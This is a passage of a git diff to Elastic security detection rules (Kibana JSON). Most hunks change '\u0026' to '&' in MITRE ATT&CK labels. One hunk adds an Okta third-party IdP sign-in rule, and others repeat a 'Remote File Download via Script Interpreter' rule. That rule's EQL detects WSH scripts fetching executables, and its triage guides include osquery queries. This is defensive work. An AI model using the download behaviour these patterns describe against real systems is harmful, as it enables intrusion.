details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Threat: Orbit", + "Threat: Lightning Framework", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1037", + "name": "Boot or Logon Initialization Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/", + "subtechnique": [ + { + "id": "T1037.004", + "name": "RC Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/004/" + } + ] + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.006", + "name": "Dynamic Linker Hijacking", + "reference": "https://attack.mitre.org/techniques/T1574/006/" + } + ] + }, + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.002", + "name": "Systemd Service", + "reference": "https://attack.mitre.org/techniques/T1543/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.003", + "name": "Cron", + "reference": "https://attack.mitre.org/techniques/T1053/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.003", + "name": "Sudo and Sudo Caching", + "reference": "https://attack.mitre.org/techniques/T1548/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "1c84dd64-7e6c-4bad-ac73-a5014ee37042_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1c966416-60c1-436b-bfd0-e002fddbfd89_101.json b/packages/security_detection_engine/kibana/security_rule/1c966416-60c1-436b-bfd0-e002fddbfd89_101.json index 2c7207d549d..2e5f8d7ae1c 100644 --- a/packages/security_detection_engine/kibana/security_rule/1c966416-60c1-436b-bfd0-e002fddbfd89_101.json +++ b/packages/security_detection_engine/kibana/security_rule/1c966416-60c1-436b-bfd0-e002fddbfd89_101.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/1c966416-60c1-436b-bfd0-e002fddbfd89_102.json b/packages/security_detection_engine/kibana/security_rule/1c966416-60c1-436b-bfd0-e002fddbfd89_102.json index 02bc2621bbc..2da6e86f6dd 100644 --- a/packages/security_detection_engine/kibana/security_rule/1c966416-60c1-436b-bfd0-e002fddbfd89_102.json +++ b/packages/security_detection_engine/kibana/security_rule/1c966416-60c1-436b-bfd0-e002fddbfd89_102.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/1ca62f14-4787-4913-b7af-df11745a49da_1.json b/packages/security_detection_engine/kibana/security_rule/1ca62f14-4787-4913-b7af-df11745a49da_1.json index 7c9b7936c8b..e8efc976b3c 100644 --- a/packages/security_detection_engine/kibana/security_rule/1ca62f14-4787-4913-b7af-df11745a49da_1.json +++ b/packages/security_detection_engine/kibana/security_rule/1ca62f14-4787-4913-b7af-df11745a49da_1.json @@ -41,7 +41,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/1cd01db9-be24-4bef-8e7c-e923f0ff78ab_103.json b/packages/security_detection_engine/kibana/security_rule/1cd01db9-be24-4bef-8e7c-e923f0ff78ab_103.json index a0ff7c96b7e..486534d06d9 100644 --- a/packages/security_detection_engine/kibana/security_rule/1cd01db9-be24-4bef-8e7c-e923f0ff78ab_103.json +++ b/packages/security_detection_engine/kibana/security_rule/1cd01db9-be24-4bef-8e7c-e923f0ff78ab_103.json @@ -91,7 +91,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/1cd01db9-be24-4bef-8e7c-e923f0ff78ab_104.json b/packages/security_detection_engine/kibana/security_rule/1cd01db9-be24-4bef-8e7c-e923f0ff78ab_104.json index c4ee8676d06..ac330ddfb52 100644 --- a/packages/security_detection_engine/kibana/security_rule/1cd01db9-be24-4bef-8e7c-e923f0ff78ab_104.json +++ b/packages/security_detection_engine/kibana/security_rule/1cd01db9-be24-4bef-8e7c-e923f0ff78ab_104.json @@ -90,7 +90,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/1cd01db9-be24-4bef-8e7c-e923f0ff78ab_105.json b/packages/security_detection_engine/kibana/security_rule/1cd01db9-be24-4bef-8e7c-e923f0ff78ab_105.json index 46fe5fc49d0..a0d1cbce775 100644 --- a/packages/security_detection_engine/kibana/security_rule/1cd01db9-be24-4bef-8e7c-e923f0ff78ab_105.json +++ b/packages/security_detection_engine/kibana/security_rule/1cd01db9-be24-4bef-8e7c-e923f0ff78ab_105.json @@ -90,7 +90,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/1cd01db9-be24-4bef-8e7c-e923f0ff78ab_106.json b/packages/security_detection_engine/kibana/security_rule/1cd01db9-be24-4bef-8e7c-e923f0ff78ab_106.json index acfc0071bbf..ea4c9c17401 100644 --- a/packages/security_detection_engine/kibana/security_rule/1cd01db9-be24-4bef-8e7c-e923f0ff78ab_106.json +++ b/packages/security_detection_engine/kibana/security_rule/1cd01db9-be24-4bef-8e7c-e923f0ff78ab_106.json @@ -91,7 +91,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/1ceb05c4-7d25-11ee-9562-f661ea17fbcd_1.json b/packages/security_detection_engine/kibana/security_rule/1ceb05c4-7d25-11ee-9562-f661ea17fbcd_1.json index f24b3e4f1fa..8f00a0215ae 100644 --- a/packages/security_detection_engine/kibana/security_rule/1ceb05c4-7d25-11ee-9562-f661ea17fbcd_1.json +++ b/packages/security_detection_engine/kibana/security_rule/1ceb05c4-7d25-11ee-9562-f661ea17fbcd_1.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/1ceb05c4-7d25-11ee-9562-f661ea17fbcd_2.json b/packages/security_detection_engine/kibana/security_rule/1ceb05c4-7d25-11ee-9562-f661ea17fbcd_2.json new file mode 100644 index 00000000000..06b7ea59f6e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1ceb05c4-7d25-11ee-9562-f661ea17fbcd_2.json @@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects sign-in events where authentication is carried out via a third-party Identity Provider (IdP).", + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-okta*" + ], + "interval": "15m", + "language": "kuery", + "license": "Elastic License v2", + "name": "Okta Sign-In Events via Third-Party IdP", + "note": "## Triage and analysis\n\n### Investigating Okta Sign-In Events via Third-Party IdP\n\nThis rule detects sign-in events where authentication is carried out via a third-party Identity Provider (IdP).\n\nAdversaries may attempt to add an unauthorized IdP to an Okta tenant to gain access to the tenant. Following this action, adversaries may attempt to sign in to the tenant using the unauthorized IdP. This rule detects both the addition of an unauthorized IdP and the subsequent sign-in attempt.\n\n#### Possible investigation steps:\n- Identify the third-party IdP by examining the `okta.authentication_context.issuer.id` field.\n- Once the third-party IdP is identified, determine if this IdP is authorized to be used by the tenant.\n- If the IdP is unauthorized, deactivate it immediately via the Okta console.\n- Identify the actor associated with the IdP creation by examining the `okta.actor.id`, `okta.actor.type`, `okta.actor.alternate_id`, and `okta.actor.display_name` fields in historical data.\n - The `New Okta Identity Provider (IdP) Added by Admin` rule may be helpful in identifying the actor and the IdP creation event.\n- Determine the client used by the actor. Review the `okta.client.ip`, `okta.client.user_agent.raw_user_agent`, `okta.client.zone`, `okta.client.device`, and `okta.client.id` fields.\n- If the client is a device, check the `okta.device.id`, `okta.device.name`, `okta.device.os_platform`, `okta.device.os_version`, and `okta.device.managed` fields.\n- Review the past activities of the actor involved in this action by checking their previous actions logged in the `okta.target` field.\n- Examine the `okta.request.ip_chain` field to potentially determine if the actor used a proxy or VPN to perform this action.\n- Evaluate the actions that happened just before and after this event in the `okta.event_type` field to help understand the full context of the activity.\n\n### False positive analysis:\n- It might be a false positive if this IdP is authorized to be used by the tenant.\n- This may be a false positive if an authorized third-party IdP is used to sign in to the tenant but failures occurred due to an incorrect configuration.\n\n### Response and remediation:\n- If the IdP is unauthorized, deactivate it immediately via the Okta console.\n- Reset the effected user's password and enforce MFA re-enrollment, if applicable.\n- Mobile device forensics may be required to determine if the user's device is compromised.\n- If the IdP is authorized, ensure that the actor who created it is authorized to do so.\n- If the actor is unauthorized, deactivate their account via the Okta console.\n- If the actor is authorized, ensure that the actor's account is not compromised.\n\n- Block the IP address or device used in the attempts if they appear suspicious, using the data from the `okta.client.ip` and `okta.device.id` fields.\n- Conduct a review of Okta policies and ensure they are in accordance with security best practices.\n- If the deactivated IdP was crucial to the organization, consider adding a new IdP and removing the unauthorized IdP.", + "query": "event.dataset:okta.system and okta.debug_context.debug_data.request_uri:/oauth2/v1/authorize/callback and\n (not okta.authentication_context.issuer.id:Okta and event.action:(user.authentication.auth_via_IDP\n or user.authentication.auth_via_inbound_SAML\n or user.authentication.auth_via_mfa\n or user.authentication.auth_via_social)\n or event.action:user.session.start) or\n (event.action:user.authentication.auth_via_IDP and okta.outcome.result:FAILURE\n and okta.outcome.reason:(\"A SAML assert with the same ID has already been processed by Okta for a previous request\"\n or \"Unable to match transformed username\"\n or \"Unable to resolve IdP endpoint\"\n or \"Unable to validate SAML Response\"\n or \"Unable to validate incoming SAML Assertion\"))\n", + "references": [ + "https://blog.cloudflare.com/cloudflare-investigation-of-the-january-2022-okta-compromise/", + "https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy", + "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection", + "https://unit42.paloaltonetworks.com/muddled-libra/" + ], + "related_integrations": [ + { + "package": "okta", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": false, + "name": "okta.authentication_context.issuer.id", + "type": "keyword" + }, + { + "ecs": false, + "name": "okta.debug_context.debug_data.request_uri", + "type": "keyword" + }, + { + "ecs": false, + "name": "okta.outcome.reason", + "type": "keyword" + }, + { + "ecs": false, + "name": "okta.outcome.result", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1ceb05c4-7d25-11ee-9562-f661ea17fbcd", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Use Case: Identity and Access Audit", + "Tactic: Initial Access", + "Data Source: Okta" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1199", + "name": "Trusted Relationship", + "reference": "https://attack.mitre.org/techniques/T1199/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 2 + }, + "id": "1ceb05c4-7d25-11ee-9562-f661ea17fbcd_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_104.json b/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_104.json index c6ee27eee4a..2989fdb921f 100644 --- a/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_104.json +++ b/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_104.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via Script Interpreter", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via Script Interpreter\n\nThe Windows Script Host (WSH) is a Windows automation technology, which is ideal for non-interactive scripting needs, such as logon scripting, administrative scripting, and machine automation.\n\nAttackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but can also use them to download tools and utilities needed to accomplish their goals.\n\nThis rule looks for DLLs and executables downloaded using `cscript.exe` or `wscript.exe`.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze both the script and the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- The usage of these script engines by regular users is unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via Script Interpreter\n\nThe Windows Script Host (WSH) is a Windows automation technology, which is ideal for non-interactive scripting needs, such as logon scripting, administrative scripting, and machine automation.\n\nAttackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but can also use them to download tools and utilities needed to accomplish their goals.\n\nThis rule looks for DLLs and executables downloaded using `cscript.exe` or `wscript.exe`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze both the script and the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- The usage of these script engines by regular users is unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by host.id, process.entity_id\n [network where host.os.type == \"windows\" and process.name : (\"wscript.exe\", \"cscript.exe\") and network.protocol != \"dns\" and\n network.direction : (\"outgoing\", \"egress\") and network.type == \"ipv4\" and destination.ip != \"127.0.0.1\"\n ]\n [file where host.os.type == \"windows\" and event.type == \"creation\" and file.extension : (\"exe\", \"dll\")]\n", "related_integrations": [ { @@ -90,7 +90,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_105.json b/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_105.json index 61113869feb..45416580945 100644 --- a/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_105.json +++ b/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_105.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via Script Interpreter", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via Script Interpreter\n\nThe Windows Script Host (WSH) is a Windows automation technology, which is ideal for non-interactive scripting needs, such as logon scripting, administrative scripting, and machine automation.\n\nAttackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but can also use them to download tools and utilities needed to accomplish their goals.\n\nThis rule looks for DLLs and executables downloaded using `cscript.exe` or `wscript.exe`.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze both the script and the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- The usage of these script engines by regular users is unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via Script Interpreter\n\nThe Windows Script Host (WSH) is a Windows automation technology, which is ideal for non-interactive scripting needs, such as logon scripting, administrative scripting, and machine automation.\n\nAttackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but can also use them to download tools and utilities needed to accomplish their goals.\n\nThis rule looks for DLLs and executables downloaded using `cscript.exe` or `wscript.exe`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze both the script and the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- The usage of these script engines by regular users is unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by host.id, process.entity_id\n [network where host.os.type == \"windows\" and process.name : (\"wscript.exe\", \"cscript.exe\") and network.protocol != \"dns\" and\n network.direction : (\"outgoing\", \"egress\") and network.type == \"ipv4\" and destination.ip != \"127.0.0.1\"\n ]\n [file where host.os.type == \"windows\" and event.type == \"creation\" and file.extension : (\"exe\", \"dll\")]\n", "related_integrations": [ { @@ -90,7 +90,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_106.json b/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_106.json index 6b2029475a5..4bda7289a0d 100644 --- a/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_106.json +++ b/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_106.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via Script Interpreter", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via Script Interpreter\n\nThe Windows Script Host (WSH) is a Windows automation technology, which is ideal for non-interactive scripting needs, such as logon scripting, administrative scripting, and machine automation.\n\nAttackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but can also use them to download tools and utilities needed to accomplish their goals.\n\nThis rule looks for DLLs and executables downloaded using `cscript.exe` or `wscript.exe`.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze both the script and the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, 